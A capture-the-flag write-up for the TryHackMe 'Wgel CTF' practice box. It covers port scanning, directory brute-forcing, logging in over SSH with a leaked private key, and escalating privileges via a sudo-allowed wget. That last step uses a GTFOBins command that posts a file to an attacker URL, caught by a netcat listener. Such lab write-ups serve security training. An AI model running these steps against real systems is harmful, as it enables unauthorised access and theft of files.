TryHackMe — Wgel CTF

Wgel CTF

Have fun with this easy box.

Link to the room : TryHackMe | Wgel CTF

Let’s start with a rustscan enumeration.

Run rustscan -a 10.10.10.247 — ulimit 5000 — -A -vvv -sV -sC -Pn

Looking at above results, we have 2 ports open:22,80.

Let’s inspect the view page source on port 80.

It’s look like we had found a user name: jessie.

The next step will be to brute force directories.

Run gobuster dir -u 10.10.158.73 -w /usr/share/dirb/wordlists/common.txt

Let’s check the above discovered directories.

We can notice , we didn’t manage to discover any important information.

So, I like to use the following :

gobuster dir -u http://10.10.158.73/sitemap -w /usr/share/dirb/wordlists/common.txt

to dig deeper.

We have found few subdirectories. Let’s check the subdirectories.

After I checked all the /sitemap/subdirectories , I finally discovered something “juicy” , an id_rsa key.

Create a new file, named ssh. Copy the id_rsa key and paste it to ssh file. Change the permissions for ssh.txt.

Use chmod 600 ssh.

We will attempt to login, using the id_rsa key (ssh) and the found user name “jessie”.

Run ssh -i ssh jessie@10.10.158.73

We successfully logged in. !Let’s check for the user_flag.txt

There we go, user flag!

The next step for us will be : Privilege escalation.

Run sudo -l to discover what commands we can run.

Looking at above result, we can run /usr/bin/wget

Navigate to : GTFOBins. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

URL=http://attackerip/
LFILE=file_to_send
wget --post-file=$LFILE $URL

Open a new terminal , open a listener , use nc -nvlp 34567 (port number)

Ohh , yeah, we’ve got the root_flag.txt.

Thank you for reading, I hope you enjoyed.

You can find me on : TryHackMe | cody1